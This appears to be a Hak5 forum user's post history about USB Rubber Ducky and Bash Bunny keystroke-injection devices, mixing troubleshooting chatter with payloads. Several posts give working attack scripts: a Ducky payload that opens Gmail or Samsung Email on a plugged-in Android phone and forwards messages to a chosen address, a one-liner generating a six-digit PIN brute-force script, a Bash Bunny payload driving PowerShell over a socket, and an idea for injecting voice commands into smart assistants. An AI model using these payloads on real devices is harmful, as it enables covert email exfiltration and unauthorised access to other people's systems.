Jump to content


Active Members
  • Content Count

  • Joined

  • Last visited

  • Days Won


Everything posted by Cribbit

  1. Spywll this must be a bug. Hopefully the Hak5 team are working on this for 1.4. after all if you are quacking a number you want a number. And you can stop a large proportion of payloads working just by turning NumLock off. @Darren Kitchen (sorry to ping you but just bring this issue to your attention)
  2. I don't know if this will be any use to anyone but. i create a poc to demonstrate sending the a status/progress of a powershell script to the bunny. The ps only send number 1,2 (3or4) & 5 with sleeps in between. And the bunny just changes it's LED depending on the number. when it get a 5 it quack the command to closes the powershell windows. #!/bin/bash trap "kill 0" EXIT LED SETUP ATTACKMODE RNDIS_ETHERNET HID GET SWITCH_POSITION GET HOST_IP cd /root/udisk/payloads/$SWITCH_POSITION/ FILE=data.txt #Clear old commands if [ -f "$FILE" ]; then cat /dev/null > "$FILE" fi LED SPECIAL # Set up an echo command to right to file. # using echo as nc only finish writing when the connection closes. CMD="while true; do read i && echo \$i >> $FILE ; done" # set nc to run in its own process nc -lvn -p 8080 -c "$CMD" & # give nc time to start sleep 1 # set the last command to empty last=""; LED ATTACK Q DELAY 200 RUN WIN "powershell" Q DELAY 100 # Create a connect object Q STRING "\$client = New-Object System.Net.Sockets.TcpClient;" Q DELAY 100 # set the host and port and connect to nc Q STRING "\$client.Connect(\"$HOST_IP\",8080);" Q DELAY 100 # create a stream for that connection Q STRING "\$stream = new-object System.IO.StreamWriter \$client.GetStream();" Q DELAY 100 # get powershell to sleep Q STRING "Start-Sleep -Seconds 3;" Q DELAY 100 # the 1 the the stream Q STRING "\$stream.WriteLine(\"1\");" Q DELAY 100 # push this over to nc Q STRING "\$stream.Flush();" Q DELAY 100 Q STRING "Start-Sleep -Seconds 3;" Q DELAY 100 Q STRING "\$stream.WriteLine(\"2\");" Q DELAY 100 Q STRING "\$stream.Flush();" Q DELAY 100 Q STRING "Start-Sleep -Seconds 3;" Q DELAY 200 # Send a 3 or 4 Q STRING "\$stream.WriteLine((3+(Get-Random -Maximum 2)).ToString());" Q DELAY 100 Q STRING "\$stream.Flush();" Q DELAY 100 Q STRING "Start-Sleep -Seconds 3;" Q DELAY 100 Q STRING "\$stream.WriteLine(\"5\");" Q DELAY 100 Q STRING "\$stream.Flush();" Q DELAY 100 #Close connection Q STRING "\$client.Close();" Q DELAY 100 Q ENTER LED SPECIAL # forever loop while : do # get the last line of the file removing line feeds (10) and carriage returns (13) curr=$(tail -1 "$FILE" | tr -d '\r\n') #curr=$(tail -1 "$FILE" | sed -e 's/[\r\n]//g') # see if the last command is different to the curr command if [ "$last" != "$curr" ] ; then # set the last to the current command last="$curr" # go to the section based on the command # most just change led color and rate on flashing. case $curr in 1) LED STAGE1;; 2) LED SPECIAL2;; 3) LED STAGE3;; 4) LED STAGE4;; 5) LED SPECIAL5 Q DELAY 100 # close powershell Q STRING "exit" Q ENTER break;; esac fi done LED FINISH sleep 1 The powershell is all on different lines just to make it easy to read. As i said don't know if this will of any uses to anyone but it may you never know may spark an idea in someone else
  3. Is num lock on i had this trouble. For some reason when I do a QUACK STRING “8” it send the KEYPAD 8 (00,00,60) not the top row 8 (00,00,25) and if Num lock is off getting the UP ARROW
  4. @rcanpolat glad its working. The firmware has never been updated to my knowledge. Even on the hak5 download page it's still 1.0 https://downloads.hak5.org/ducky
  5. If you have access to Linux/Bash you could use it to generate the ducky script you want: echo {000000..999999} | xargs -n 1 echo GUI r$'\n'DELAY 100$'\n'STRING C:\\app\\software\\app.exe$'\n'ENTER$'\n'DELAY 1000$'\n'STRING | sed '0~6 s/$/\nENTER\nENTER/g'>Ducky.txt It will take some time to execute.
  6. Probably not as many manufacturers add/remove shortcuts Here are the shortcuts for a Samsung don't know how many are generic to Android: Home screen: Apps list - Alt + A System: Home - GUI + Enter Back - GUI + Backspace Recent - Alt + Tab Notifications - GUI + N Keyboard shortcuts - GUI + / Lock Screen - GUI + L Switch Languages - SHIFT + SPACE Switch Languages - CTRL + SPACE Switch Languages - LEFT ALT + SHIFT Start/Exit DeX mode GUI + W Applications: Browser - GUI + B Contacts - GUI + C Email - GUI + E Messages - GUI + S Music - GUI + P Calendar - GUI + K
  7. Hi @sputnik-1, There is no loop for the ducky there is for the bash bunny. but there is a payload already created for this. you should watch episode 1217.1 and .2
  8. the Fees you have to pay are Import tax and VAT (plus handling charges for the delivery company, if they do the taxes). https://www.gov.uk/goods-sent-from-abroad
  9. I was playing around with the ducky and an android phone and wrote a payload to forward an email to the address specified. There are two version one for Gmail and one for Samsung Email. Use GUI + E to find your default app. I put a comment in for a loop so if you wish to forward more than one. GMAIL: REM Forwards the first email in the primary section REM Only works for phones. REM Does not work tablets as menu bar stops tabs REM GMAIL SHORTCUTS https://support.google.com/mail/answer/6594?co=GENIE.Platform%3DAndroid&hl=en&oco=1 DELAY 1000 GUI e DELAY 1000 TAB DELAY 500 TAB DELAY 500 ENTER REM LOOP FROM HERE DELAY 500 CTRL r DELAY 1000 TAB DELAY 500 SHIFT TAB DELAY 500 BACKSPACE DELAY 500 STRING your@email.com CTRL ENTER DELAY 1000 REM Moves to the next email RIGHTARROW REM GOTO LOOP SAMSUNG: REM Forwards the first email DELAY 1000 GUI e DELAY 1000 TAB DELAY 500 TAB DELAY 500 TAB DELAY 500 TAB DELAY 500 ENTER REM LOOP FROM HERE DELAY 500 SHIFT TAB DELAY 500 LEFTARROW LEFTARROW LEFTARROW LEFTARROW RIGHTARROW RIGHTARROW ENTER DELAY 500 STRING your@email.com DELAY 500 SHIFT TAB DELAY 500 SHIFT TAB DELAY 500 ENTER DELAY 500 REM Moves to the next email TAB RIGHTARROW RIGHTARROW LEFTARROW ENTER REM GOTO LOOP
  10. Hi, Just wondering if we are going to get Ducky 2.0 for the Ducky? So we can get the hold functions etc Also just a suggestion can we get a USB-C version as laptop seem to be dropping all port but C. or something like the SanDisk Ultra Dual Drive that has USB-A at one end and USB-C at the other.
  11. It would also be good if it could also act as a sound card / headphone out. So one it would suppress the response, then other people in the room would not get wise. The audio could also be save to a file and analysed for correct responses. But you could also send data over the audio channel(s) (like in the air-gap episode with minimodem). For example if the sysadmins had a no USB disk mounting configuration.
  12. Hi, Properly not as the computer needs to recognise it before it can work. But there are media keyboard buttons defined in the encoder. Two which may be of interest too you are (MEDIA_MUTE or MUTE) and (MEDIA_VOLUME_DEC or VOLUMEDOWN). The reason for two names for each is the second is an alias. You could give them a go and see.
  13. Cribbit

    Hak5 Gear

    Are you talking about the shoulder bag? I know one of the authorized resellers sells them fonefunshop in the UK, but they are expensive! And you can get something similar if you search online much cheaper but it will not have the Hak5 logo's on it. https://www.fonefunshop.com/specialist-products/hak5/hak5-tactical-edc-bag-every-day-carry-shoulder-bag.html https://shop.hak5.org/pages/authorized-resellers
  14. I think you just need parental control software. Which can be installed on PC's (and phones). You'll have to check if the are legal to uses where you live. https://www.techradar.com/best/parental-control
  15. I don't think there is any documentation but the code for the encoder is open source: https://github.com/hak5darren/USB-Rubber-Ducky/blob/master/Encoder/src/Encoder.java
  16. REM Copys the contents of c.txt on the root of the ducky to the clipboard REM Follow the step in the link below to set up Ducky REM https://docs.hak5.org/hc/en-us/articles/360010555213-Stealing-Files-with-the-USB-Rubber-Ducky-USB-Exfiltration-Explained DELAY 1000 GUI r DELAY 100 STRING powershell ".(Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''_''').Name+'c.txt')))" ENTER
  17. Hey ebmar, it most likely depends on how lock down you system is. But I suggest you watch episode 2112/2113 “Stealing Files with the USB Rubber Ducky”. Instead of copy a file too the ducky, copy it from the ducky. Then open it in note pad then ctrl-a and ctrl-c it. You’ll need to install the twin duck firmware. Hope this help getting you started.
  18. Just throwing this out as an idea for a new device emulation for the bash bunny a USB microphone. With a new command to play an audio file stored on it. So you could plug it in to a smart device and in you audio file you have a voice say “Hey Google/Alexa/Siri/Cortana go to this site”, “Order 500 copy of ...” or “set alarm for 2am”.
  • Create New...